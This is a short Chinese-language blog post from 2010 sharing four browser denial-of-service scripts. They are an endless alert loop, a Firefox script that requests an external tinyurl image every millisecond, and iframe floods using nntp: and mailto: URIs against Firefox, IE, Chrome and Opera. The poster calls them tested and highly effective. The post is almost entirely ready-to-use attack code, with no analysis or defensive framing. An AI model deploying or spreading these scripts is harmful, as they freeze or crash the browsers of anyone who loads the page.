 |
日历
« June 2010 » |
Su |
Mo |
Tu |
We |
Th |
Fr |
Sa |
| | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |
|
 |
PortWatcher's Blog
Monday, 2025-06-30, 4:15 AM Welcome Guest
BlogMain » 2010 » June » 05 » 关于浏览器的DOS
|
黑防的大大幻泉整理的````可行性很高````代码测试均通过```` 代码1 Code <script> while(1)alert('hello world'); </script> 代码2 Code
<html> <head> <title>Firefox DoS Exploit </title> <script> function DoS() { img = new Image(); img.src = "http://tinyurl.com/5364"; setTimeout(DoS,1); } </script> </head> <body onLoad="DoS()"> </body> </html> 代码3 Code <html> <head> <title>Firefox, IE & Opera DoS Exploit </title> <script> var iframe; function DoS(){ iframe = document.createElement("IFRAME"); iframe.src = "nntp://1"; iframe.style.visibility = "hidden"; document.body.appendChild(iframe); setTimeout(DoS,1);} </script> </head> <body onLoad="DoS()"></body> </html> 代码4 Code <html> <head> <title>Firefox, IE, Chrome & Opera DoS Exploit DoS </title> <script> var iframe; function DoS() { iframe = document.createElement("IFRAME"); iframe.src = "mailto:test@test.com"; iframe.style.visibility = "hidden"; document.body.appendChild(iframe); setTimeout(DoS,1); } </script> </head> <body onLoad="DoS()"> </body> </html>
|
Category: coding |
Views: 749 |
Added by: Jury
| Rating: 4.0/1 |
|
 |